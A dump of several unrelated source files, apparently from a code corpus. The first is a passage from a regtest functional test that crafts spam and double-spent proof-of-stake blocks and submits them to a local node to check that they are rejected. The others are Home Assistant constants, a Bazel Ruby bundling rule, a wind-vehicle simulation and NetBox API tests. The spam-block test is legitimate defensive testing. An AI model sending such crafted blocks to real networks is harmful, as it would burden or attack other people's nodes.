raw_stake = self.node.createrawzerocoinstake(block.prevoutStake)
stake_tx_signed_raw_hex = raw_stake["hex"]
# Get stake TX private key to sign the block with
stake_pkey = raw_stake["private-key"]
self.block_sig_key.set_compressed(True)
self.block_sig_key.set_secretbytes(bytes.fromhex(stake_pkey))
else:
# Create a new private key and get the corresponding public key
self.block_sig_key.set_secretbytes(hash256(pack('<I', 0xffff)))
pubkey = self.block_sig_key.get_pubkey()
# Create the raw stake TX (unsigned)
scriptPubKey = CScript([pubkey, OP_CHECKSIG])
outNValue = int(stake_in_value + 2*COIN)
stake_tx_unsigned = CTransaction()
stake_tx_unsigned.nTime = block.nTime
stake_tx_unsigned.vin.append(CTxIn(block.prevoutStake))
stake_tx_unsigned.vin[0].nSequence = 0xffffffff
stake_tx_unsigned.vout.append(CTxOut())
stake_tx_unsigned.vout.append(CTxOut(outNValue, scriptPubKey))
# Sign the stake TX
stake_tx_signed_raw_hex = self.node.signrawtransaction(bytes_to_hex_str(stake_tx_unsigned.serialize()))['hex']
# Deserialize the signed raw tx into a CTransaction object and return it
stake_tx_signed = CTransaction()
stake_tx_signed.deserialize(BytesIO(hex_str_to_bytes(stake_tx_signed_raw_hex)))
return stake_tx_signed
def get_prevouts(self, utxo_list, blockHeight, zpos=False):
''' get prevouts (map) for each utxo in a list
:param utxo_list: <if zpos=False> (JSON list) utxos returned from listunspent used as input
<if zpos=True> (JSON list) mints returned from listmintedzerocoins used as input
blockHeight: (int) height of the previous block
zpos: (bool) type of utxo_list
:return: stakingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints to amount, block_time, nStakeModifier, hashStake
'''
zerocoinDenomList = [1, 5, 10, 50, 100, 500, 1000, 5000]
stakingPrevOuts = {}
for utxo in utxo_list:
if zpos:
# get mint checkpoint
checkpointHeight = blockHeight - 200
checkpointBlock = self.node.getblock(self.node.getblockhash(checkpointHeight), True)
checkpoint = int(checkpointBlock['acc_checkpoint'], 16)
# parse checksum and get checksumblock
pos = zerocoinDenomList.index(utxo['denomination'])
checksum = (checkpoint >> (32 * (len(zerocoinDenomList) - 1 - pos))) & 0xFFFFFFFF
checksumBlock = self.node.getchecksumblock(hex(checksum), utxo['denomination'], True)
# get block hash and block time
txBlockhash = checksumBlock['hash']
txBlocktime = checksumBlock['time']
else:
# get raw transaction for current input
utxo_tx = self.node.getrawtransaction(utxo['txid'], 1)
# get block hash and block time
txBlocktime = utxo_tx['blocktime']
txBlockhash = utxo_tx['blockhash']
# get Stake Modifier
stakeModifier = int(self.node.getblock(txBlockhash)['modifier'], 16)
# assemble prevout object
utxo_to_stakingPrevOuts(utxo, stakingPrevOuts, txBlocktime, stakeModifier, zpos)
return stakingPrevOuts
def log_data_dir_size(self):
''' Prints the size of the '/regtest/blocks' directory.
:param:
:return:
'''
init_size = dir_size(self.node.datadir + "/regtest/blocks")
self.log.info("Size of data dir: %s kilobytes" % str(init_size))
def test_spam(self, name, staking_utxo_list,
fRandomHeight=False, randomRange=0, randomRange2=0,
fDoubleSpend=False, fMustPass=False, fZPoS=False,
spending_utxo_list=[]):
''' General method to create, send and test the spam blocks
:param name: (string) chain branch (usually either "Main" or "Forked")
staking_utxo_list: (string list) utxos to use for staking
fRandomHeight: (bool) send blocks at random height
randomRange: (int) if fRandomHeight=True, height is >= current-randomRange
randomRange2: (int) if fRandomHeight=True, height is < current-randomRange2
fDoubleSpend: (bool) if true, stake input is double spent in block.vtx
fMustPass: (bool) if true, the blocks must be stored on disk
fZPoS: (bool) stake the block with zerocoin
spending_utxo_list: (string list) utxos to use for spending
:return: err_msgs: (string list) reports error messages from the test
or an empty list if test is successful
'''
# Create empty error messages list
err_msgs = []
# Log initial datadir size
self.log_data_dir_size()
# Get latest block number and hash
block_count = self.node.getblockcount()
pastBlockHash = self.node.getblockhash(block_count)
randomCount = block_count
self.log.info("Current height: %d" % block_count)
for i in range(0, self.NUM_BLOCKS):
if i !=0:
self.log.info("Sent %d blocks out of %d" % (i, self.NUM_BLOCKS))
# if fRandomHeight=True get a random block number (in range) and corresponding hash
if fRandomHeight:
randomCount = randint(block_count - randomRange, block_count - randomRange2)
pastBlockHash = self.node.getblockhash(randomCount)
# Get spending prevouts and staking prevouts for the height of current block
current_block_n = randomCount + 1
stakingPrevOuts = self.get_prevouts(staking_utxo_list, randomCount, zpos=fZPoS)
spendingPrevOuts = self.get_prevouts(spending_utxo_list, randomCount)
# Create the spam block
block = self.create_spam_block(pastBlockHash, stakingPrevOuts, current_block_n,
fStakeDoubleSpent=fDoubleSpend, fZPoS=fZPoS, spendingPrevOuts=spendingPrevOuts)
# Log time and size of the block
block_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(block.nTime))
block_size = len(block.serialize())/1000
self.log.info("Sending block %d [%s...] - nTime: %s - Size (kb): %.2f",
current_block_n, block.hash[:7], block_time, block_size)
# Try submitblock
var = self.node.submitblock(bytes_to_hex_str(block.serialize()))
time.sleep(1)
if (not fMustPass and var not in [None, "bad-txns-invalid-zpiv"]) or (fMustPass and var != "inconclusive"):
self.log.error("submitblock [fMustPass=%s] result: %s" % (str(fMustPass), str(var)))
err_msgs.append("submitblock %d: %s" % (current_block_n, str(var)))
# Try sending the message block
msg = msg_block(block)
try:
self.test_nodes[0].handle_connect()
self.test_nodes[0].send_message(msg)
time.sleep(2)
block_ret = self.node.getblock(block.hash)
if not fMustPass and block_ret is not None:
self.log.error("Error, block stored in %s chain" % name)
err_msgs.append("getblock %d: result not None" % current_block_n)
if fMustPass:
if block_ret is None:
self.log.error("Error, block NOT stored in %s chain" % name)
err_msgs.append("getblock %d: result is None" % current_block_n)
else:
self.log.info("Good. Block IS stored on disk.")
except JSONRPCException as e:
exc_msg = str(e)
if exc_msg == "Can't read block from disk (-32603)":
if fMustPass:
self.log.warning("Bad! Block was NOT stored to disk.")
err_msgs.append(exc_msg)
else:
self.log.info("Good. Block was not stored on disk.")
else:
self.log.warning(exc_msg)
err_msgs.append(exc_msg)
except Exception as e:
exc_msg = str(e)
self.log.error(exc_msg)
err_msgs.append(exc_msg)
self.log.info("Sent all %s blocks." % str(self.NUM_BLOCKS))
# Log final datadir size
self.log_data_dir_size()
# Return errors list
return err_msgs
|
py | 1a40b8430d7f890e125bf2ec6a0e4dabff9d199b | """Constants for the Vilfo Router integration."""
from homeassistant.const import DEVICE_CLASS_TIMESTAMP
DOMAIN = "vilfo"
ATTR_API_DATA_FIELD = "api_data_field"
ATTR_API_DATA_FIELD_LOAD = "load"
ATTR_API_DATA_FIELD_BOOT_TIME = "boot_time"
ATTR_DEVICE_CLASS = "device_class"
ATTR_ICON = "icon"
ATTR_LABEL = "label"
ATTR_LOAD = "load"
ATTR_UNIT = "unit"
ATTR_BOOT_TIME = "boot_time"
ROUTER_DEFAULT_HOST = "admin.vilfo.com"
ROUTER_DEFAULT_MODEL = "Vilfo Router"
ROUTER_DEFAULT_NAME = "Vilfo Router"
ROUTER_MANUFACTURER = "Vilfo AB"
UNIT_PERCENT = "%"
SENSOR_TYPES = {
ATTR_LOAD: {
ATTR_LABEL: "Load",
ATTR_UNIT: UNIT_PERCENT,
ATTR_ICON: "mdi:memory",
ATTR_API_DATA_FIELD: ATTR_API_DATA_FIELD_LOAD,
},
ATTR_BOOT_TIME: {
ATTR_LABEL: "Boot time",
ATTR_ICON: "mdi:timer",
ATTR_API_DATA_FIELD: ATTR_API_DATA_FIELD_BOOT_TIME,
ATTR_DEVICE_CLASS: DEVICE_CLASS_TIMESTAMP,
},
}
|
bzl | 1a40b8dbfd7de14f784b735de1717a0a3ee1f88e | load("//ruby/private:constants.bzl", "RULES_RUBY_WORKSPACE_NAME")
load("//ruby/private:providers.bzl", "RubyRuntimeContext")
DEFAULT_BUNDLER_VERSION = "2.1.2"
BUNDLE_BIN_PATH = "bin"
BUNDLE_PATH = "lib"
SCRIPT_INSTALL_BUNDLER = "download_bundler.rb"
SCRIPT_ACTIVATE_GEMS = "activate_gems.rb"
SCRIPT_BUILD_FILE_GENERATOR = "create_bundle_build_file.rb"
# Runs bundler with arbitrary arguments
# eg: run_bundler(runtime_ctx, [ "lock", " --gemfile", "Gemfile.rails5" ])
def run_bundler(runtime_ctx, bundler_arguments):
# Now we are running bundle install
args = [
runtime_ctx.interpreter, # ruby
"-I",
".",
"-I", # Used to tell Ruby where to load the library scripts
BUNDLE_PATH, # Add vendor/bundle to the list of resolvers
"bundler/gems/bundler-{}/exe/bundle".format(runtime_ctx.bundler_version), # our binary
] + bundler_arguments
kwargs = {}
if "BUNDLER_TIMEOUT" in runtime_ctx.ctx.os.environ:
timeout_in_secs = runtime_ctx.ctx.os.environ["BUNDLER_TIMEOUT"]
if timeout_in_secs.isdigit():
kwargs["timeout"] = int(timeout_in_secs)
else:
fail("'%s' is invalid value for BUNDLER_TIMEOUT. Must be an integer." % (timeout_in_secs))
return runtime_ctx.ctx.execute(
args,
quiet = False,
# Need to run this command with GEM_HOME set so tgat the bin stubs can load the correct bundler
environment = {"GEM_HOME": "bundler", "GEM_PATH": "bundler"},
**kwargs
)
def install_bundler(runtime_ctx):
args = [
runtime_ctx.interpreter,
SCRIPT_INSTALL_BUNDLER,
runtime_ctx.bundler_version,
]
result = runtime_ctx.ctx.execute(args, environment = runtime_ctx.environment, quiet = False)
if result.return_code:
fail("Error installing bundler: {} {}".format(result.stdout, result.stderr))
def bundle_install(runtime_ctx):
bundler_args = [
"install", # bundle install
"--standalone", # Makes a bundle that can work without depending on Rubygems or Bundler at runtime.
"--binstubs={}".format(BUNDLE_BIN_PATH), # Creates a directory and place any executables from the gem there.
"--path={}".format(BUNDLE_PATH), # The location to install the specified gems to.
"--jobs=10", # run a few jobs to ensure no gem install is blocking another
]
if runtime_ctx.ctx.attr.full_index:
bundler_args.append("--full-index")
result = run_bundler(runtime_ctx, bundler_args)
if result.return_code:
fail("bundle install failed: %s%s" % (result.stdout, result.stderr))
def generate_bundle_build_file(runtime_ctx):
# Create the BUILD file to expose the gems to the WORKSPACE
# USAGE: ./create_bundle_build_file.rb BUILD.bazel Gemfile.lock repo-name [excludes-json] workspace-name
args = [
runtime_ctx.interpreter, # ruby interpreter
SCRIPT_BUILD_FILE_GENERATOR, # The template used to created bundle file
"BUILD.bazel", # Bazel build file (can be empty)
"Gemfile.lock", # Gemfile.lock where we list all direct and transitive dependencies
runtime_ctx.ctx.name, # Name of the target
repr(runtime_ctx.ctx.attr.excludes),
RULES_RUBY_WORKSPACE_NAME,
runtime_ctx.bundler_version,
]
result = runtime_ctx.ctx.execute(
args,
# The build file generation script requires bundler so we add this to make
# the correct version of bundler available
environment = {"GEM_HOME": "bundler", "GEM_PATH": "bundler"},
quiet = False,
)
if result.return_code:
fail("build file generation failed: %s%s" % (result.stdout, result.stderr))
def _rb_bundle_impl(ctx):
ctx.symlink(ctx.attr.gemfile, "Gemfile")
ctx.symlink(ctx.attr.gemfile_lock, "Gemfile.lock")
ctx.symlink(ctx.attr._create_bundle_build_file, SCRIPT_BUILD_FILE_GENERATOR)
ctx.symlink(ctx.attr._install_bundler, SCRIPT_INSTALL_BUNDLER)
ctx.symlink(ctx.attr._activate_gems, SCRIPT_ACTIVATE_GEMS)
# Setup this provider that we pass around between functions for convenience
runtime_ctx = RubyRuntimeContext(
ctx = ctx,
interpreter = ctx.path(ctx.attr.ruby_interpreter),
environment = {"RUBYOPT": "--enable-gems"},
bundler_version = ctx.attr.bundler_version,
)
# 1. Install the right version of the Bundler Gem
install_bundler(runtime_ctx)
# Create label for the Bundler executable
bundler = Label("//:bundler/gems/bundler-{}/exe/bundle".format(runtime_ctx.bundler_version))
# Run bundle install
bundle_install(runtime_ctx)
# Generate the BUILD file for the bundle
generate_bundle_build_file(runtime_ctx)
rb_bundle = repository_rule(
implementation = _rb_bundle_impl,
attrs = {
"ruby_sdk": attr.string(
default = "@org_ruby_lang_ruby_toolchain",
),
"ruby_interpreter": attr.label(
default = "@org_ruby_lang_ruby_toolchain//:ruby",
),
"gemfile": attr.label(
allow_single_file = True,
mandatory = True,
),
"gemfile_lock": attr.label(
allow_single_file = True,
),
"version": attr.string(
mandatory = False,
),
"bundler_version": attr.string(
default = DEFAULT_BUNDLER_VERSION,
),
"excludes": attr.string_list_dict(
doc = "List of glob patterns per gem to be excluded from the library",
),
"full_index": attr.bool(
default = False,
doc = "Use --full-index for bundle install",
),
"_install_bundler": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_INSTALL_BUNDLER,
),
allow_single_file = True,
),
"_create_bundle_build_file": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_BUILD_FILE_GENERATOR,
),
doc = "Creates the BUILD file",
allow_single_file = True,
),
"_activate_gems": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_ACTIVATE_GEMS,
),
allow_single_file = True,
),
},
)
|
py | 1a40b90e3eaf7cc7d1347c18e2a3f12bbe640f7d | #!/usr/bin/env python
# Direct downwind faster than the wind vehicle simulation
#
import os
from math import pi
import numpy as np
from matplotlib import pyplot as plt
from airfoil import Airfoil
from blade import Blade
from rotor import Rotor
from vehicle import Vehicle
from rk4 import RK4
ddwfttw_vehicle = None
Vwind = None
rho = None
g = None
v_schedule = None
collective_schedule = None
# Equation of motion
# Inputs:
# t: time
# x: np.array([position, velocity])
# (global) ddwfttw_vehicle
# (global) Vwind
# (global) rho: air density
# (global) g: acceleration due to gravity
# (global) v_schedule: vehicle speeds for interpolating collective
# (global) collective_schedule: collective pitch at the speeds in v_schedule
# Returns:
# xdot: np.array([velocity, acceleration])
def motion(t, x):
global ddwfttw_vehicle
global Vwind
global rho
global g
global v_schedule
global collective_schedule
# Set vehicle velocity
ddwfttw_vehicle.setSpeed(x[1])
# Get collective pitch from schedule
theta0 = np.interp(x[1], v_schedule, collective_schedule)
forces = ddwfttw_vehicle.computeForces(Vwind, rho, theta0, g)
f = sum(forces.values())
# Equations of motion
xdot = np.zeros((2))
xdot[0] = x[1]
xdot[1] = f/ddwfttw_vehicle._m
return xdot
if __name__ == "__main__":
# Conversion factors
lbm2slug = 1./32.174
mph2fps = 5280./3600.
kg2slug = 0.06852177
m2in = 1./0.0254
in2ft = 1./12.
# Vehicle parameters:
# wheel_radius: wheel radius (ft)
# gear_ratio: ratio of wheel rpm to prop rpm
# gear_efficiency: transmission efficiency
# CDf: drag coefficient for air flowing over the vehicle from front to back
# CDb: drag coefficient for air flowing over the vehicle from back to front
# Crr: coefficient of rolling resistance
# A: projected frontal area (sq ft)
# m: total vehicle mass (slug)
wheel_radius = 1.25
gear_ratio = 1.5
gear_efficiency = 0.85
CDf = 0.3
CDb = 0.4
Crr = 0.01
A = 20.
m = 650.*lbm2slug
# Wind speed (ft/sec) (positive tailwind)
Vwind = 10.*mph2fps
# Air density (slug/ft^3)
rho = 1.225*kg2slug/(m2in**3)/(in2ft**3)
# Acceleration due to gravity
g = 32.174
# NACA 0012 airfoil
airfoil = Airfoil()
airfoil.readClCdTables(os.path.join("airfoil_tables","naca6412.cltable"),
os.path.join("airfoil_tables","naca6412.cdtable"))
# Rotor blade parameters
radial = [1., 2.5, 3.5, 8.75] # Radial stations (ft)
chord = [0.2, 1.1, 1.2, 0.3] # Chord (ft)
twist = [26., 18., 16., 8.0] # Twist (deg)
blade = Blade(radial, chord, twist, airfoil)
blade.plotChord()
blade.plotTwist()
# Rotor
rotor = Rotor(blade, 2)
rotor.discretize(100)
# collective schedule based on vehicle speed
v_schedule = np.array([0.5, 0.8, 1.0, 1.5, 2.0, 2.2, 2.5, 2.6])*Vwind
collective_schedule = np.array([0., 2., 4., 6., 8., 9., 9., 9.])
# Vehicle
ddwfttw_vehicle = Vehicle(wheel_radius, gear_ratio, gear_efficiency, CDf, CDb, Crr, A, m,
rotor)
initial_speed = 0.5*Vwind # Initial condition. Start rolling at half the wind
# speed since rotor model loses accuracy below V.
# Initialize some arrays for plotting later
time = []
position = []
speed = []
theta0 = []
thrust = []
fdrag_aero = []
fdrag_rotor = []
frolling_resistance = []
# Run the DDWFTTW simulation and store some things to plot later
maxsteps = 400
dt = 0.5
initial_condition = np.array([0.0, initial_speed])
integrator = RK4(motion, 0.0, initial_condition, dt)
for i in range(maxsteps):
integrator.step()
time.append(integrator.t)
position.append(integrator.y[0])
speed.append(integrator.y[1]/mph2fps)
theta0.append(np.interp(integrator.y[1], v_schedule, collective_schedule))
thrust.append(ddwfttw_vehicle._rotor._thrust)
fdrag_aero.append(ddwfttw_vehicle._Fdrag_aero)
fdrag_rotor.append(ddwfttw_vehicle._Fdrag_rotor)
frolling_resistance.append(ddwfttw_vehicle._Frr)
print("Time step {:d}, time = {:.1f}, speed = {:.2f} mph"\
.format(i+1, integrator.t, integrator.y[1]/mph2fps))
# Kick out early if net force becomes <= 0. That means we can't go any faster.
net = thrust[i] + fdrag_aero[i] + fdrag_rotor[i] + frolling_resistance[i]
if net <= 0.:
print("Max speed reached!")
break
# Plot
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Position (ft)")
ax.plot(time, position)
ax.grid()
fig.savefig("position.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Speed (mph)")
ax.plot([time[0], time[-1]], [Vwind/mph2fps, Vwind/mph2fps])
ax.plot(time, speed)
ax.grid()
ax.legend(["Wind", "Vehicle"])
fig.savefig("speed.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Collective pitch (deg)")
ax.plot(time, theta0)
ax.grid()
fig.savefig("collective.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Vehicle forces (lbf)")
ax.plot(time, thrust)
ax.plot(time, fdrag_aero)
ax.plot(time, fdrag_rotor)
ax.plot(time, frolling_resistance)
ax.grid()
ax.legend(["Rotor thrust", "Frame drag", "Drag to spin rotor", "Rolling resistance"])
fig.savefig("forces.png", bbox_inches="tight")
|
py | 1a40b95a5f98de9885c3d34048e8e7513077ca68 | from __future__ import unicode_literals
from netaddr import IPNetwork
from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth.models import User
from django.urls import reverse
from dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site
from ipam.models import (
Aggregate, IPAddress, IP_PROTOCOL_TCP, IP_PROTOCOL_UDP, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF,
)
from users.models import Token
from utilities.tests import HttpStatusMixin
class VRFTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.vrf2 = VRF.objects.create(name='Test VRF 2', rd='65000:2')
self.vrf3 = VRF.objects.create(name='Test VRF 3', rd='65000:3')
def test_get_vrf(self):
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vrf1.name)
def test_list_vrfs(self):
url = reverse('ipam-api:vrf-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vrf(self):
data = {
'name': 'Test VRF 4',
'rd': '65000:4',
}
url = reverse('ipam-api:vrf-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VRF.objects.count(), 4)
vrf4 = VRF.objects.get(pk=response.data['id'])
self.assertEqual(vrf4.name, data['name'])
self.assertEqual(vrf4.rd, data['rd'])
def test_update_vrf(self):
data = {
'name': 'Test VRF X',
'rd': '65000:99',
}
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VRF.objects.count(), 3)
vrf1 = VRF.objects.get(pk=response.data['id'])
self.assertEqual(vrf1.name, data['name'])
self.assertEqual(vrf1.rd, data['rd'])
def test_delete_vrf(self):
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VRF.objects.count(), 2)
class RIRTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.rir1 = RIR.objects.create(name='Test RIR 1', slug='test-rir-1')
self.rir2 = RIR.objects.create(name='Test RIR 2', slug='test-rir-2')
self.rir3 = RIR.objects.create(name='Test RIR 3', slug='test-rir-3')
def test_get_rir(self):
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.rir1.name)
def test_list_rirs(self):
url = reverse('ipam-api:rir-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_rir(self):
data = {
'name': 'Test RIR 4',
'slug': 'test-rir-4',
}
url = reverse('ipam-api:rir-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(RIR.objects.count(), 4)
rir4 = RIR.objects.get(pk=response.data['id'])
self.assertEqual(rir4.name, data['name'])
self.assertEqual(rir4.slug, data['slug'])
def test_update_rir(self):
data = {
'name': 'Test RIR X',
'slug': 'test-rir-x',
}
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(RIR.objects.count(), 3)
rir1 = RIR.objects.get(pk=response.data['id'])
self.assertEqual(rir1.name, data['name'])
self.assertEqual(rir1.slug, data['slug'])
def test_delete_rir(self):
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(RIR.objects.count(), 2)
class AggregateTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.rir1 = RIR.objects.create(name='Test RIR 1', slug='test-rir-1')
self.rir2 = RIR.objects.create(name='Test RIR 2', slug='test-rir-2')
self.aggregate1 = Aggregate.objects.create(prefix=IPNetwork('10.0.0.0/8'), rir=self.rir1)
self.aggregate2 = Aggregate.objects.create(prefix=IPNetwork('172.16.0.0/12'), rir=self.rir1)
self.aggregate3 = Aggregate.objects.create(prefix=IPNetwork('192.168.0.0/16'), rir=self.rir1)
def test_get_aggregate(self):
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['prefix'], str(self.aggregate1.prefix))
def test_list_aggregates(self):
url = reverse('ipam-api:aggregate-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_aggregate(self):
data = {
'prefix': '192.0.2.0/24',
'rir': self.rir1.pk,
}
url = reverse('ipam-api:aggregate-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Aggregate.objects.count(), 4)
aggregate4 = Aggregate.objects.get(pk=response.data['id'])
self.assertEqual(str(aggregate4.prefix), data['prefix'])
self.assertEqual(aggregate4.rir_id, data['rir'])
def test_update_aggregate(self):
data = {
'prefix': '11.0.0.0/8',
'rir': self.rir2.pk,
}
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Aggregate.objects.count(), 3)
aggregate1 = Aggregate.objects.get(pk=response.data['id'])
self.assertEqual(str(aggregate1.prefix), data['prefix'])
self.assertEqual(aggregate1.rir_id, data['rir'])
def test_delete_aggregate(self):
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Aggregate.objects.count(), 2)
class RoleTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.role1 = Role.objects.create(name='Test Role 1', slug='test-role-1')
self.role2 = Role.objects.create(name='Test Role 2', slug='test-role-2')
self.role3 = Role.objects.create(name='Test Role 3', slug='test-role-3')
def test_get_role(self):
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.role1.name)
def test_list_roles(self):
url = reverse('ipam-api:role-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_role(self):
data = {
'name': 'Test Role 4',
'slug': 'test-role-4',
}
url = reverse('ipam-api:role-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Role.objects.count(), 4)
role4 = Role.objects.get(pk=response.data['id'])
self.assertEqual(role4.name, data['name'])
self.assertEqual(role4.slug, data['slug'])
def test_update_role(self):
data = {
'name': 'Test Role X',
'slug': 'test-role-x',
}
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Role.objects.count(), 3)
role1 = Role.objects.get(pk=response.data['id'])
self.assertEqual(role1.name, data['name'])
self.assertEqual(role1.slug, data['slug'])
def test_delete_role(self):
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Role.objects.count(), 2)
class PrefixTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.site1 = Site.objects.create(name='Test Site 1', slug='test-site-1')
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.vlan1 = VLAN.objects.create(vid=1, name='Test VLAN 1')
self.role1 = Role.objects.create(name='Test Role 1', slug='test-role-1')
self.prefix1 = Prefix.objects.create(prefix=IPNetwork('192.168.1.0/24'))
self.prefix2 = Prefix.objects.create(prefix=IPNetwork('192.168.2.0/24'))
self.prefix3 = Prefix.objects.create(prefix=IPNetwork('192.168.3.0/24'))
def test_get_prefix(self):
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['prefix'], str(self.prefix1.prefix))
def test_list_prefixs(self):
url = reverse('ipam-api:prefix-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_prefix(self):
data = {
'prefix': '192.168.4.0/24',
'site': self.site1.pk,
'vrf': self.vrf1.pk,
'vlan': self.vlan1.pk,
'role': self.role1.pk,
}
url = reverse('ipam-api:prefix-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Prefix.objects.count(), 4)
prefix4 = Prefix.objects.get(pk=response.data['id'])
self.assertEqual(str(prefix4.prefix), data['prefix'])
self.assertEqual(prefix4.site_id, data['site'])
self.assertEqual(prefix4.vrf_id, data['vrf'])
self.assertEqual(prefix4.vlan_id, data['vlan'])
self.assertEqual(prefix4.role_id, data['role'])
def test_update_prefix(self):
data = {
'prefix': '192.168.99.0/24',
'site': self.site1.pk,
'vrf': self.vrf1.pk,
'vlan': self.vlan1.pk,
'role': self.role1.pk,
}
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Prefix.objects.count(), 3)
prefix1 = Prefix.objects.get(pk=response.data['id'])
self.assertEqual(str(prefix1.prefix), data['prefix'])
self.assertEqual(prefix1.site_id, data['site'])
self.assertEqual(prefix1.vrf_id, data['vrf'])
self.assertEqual(prefix1.vlan_id, data['vlan'])
self.assertEqual(prefix1.role_id, data['role'])
def test_delete_prefix(self):
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Prefix.objects.count(), 2)
def test_available_ips(self):
prefix = Prefix.objects.create(prefix=IPNetwork('192.0.2.0/29'), is_pool=True)
url = reverse('ipam-api:prefix-available-ips', kwargs={'pk': prefix.pk})
# Retrieve all available IPs
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 8) # 8 because prefix.is_pool = True
# Change the prefix to not be a pool and try again
prefix.is_pool = False
prefix.save()
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 6) # 8 - 2 because prefix.is_pool = False
# Create all six available IPs
for i in range(6):
data = {
'description': 'Test IP {}'.format(i)
}
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(response.data['description'], data['description'])
# Try to create one more IP
response = self.client.post(url, {}, **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
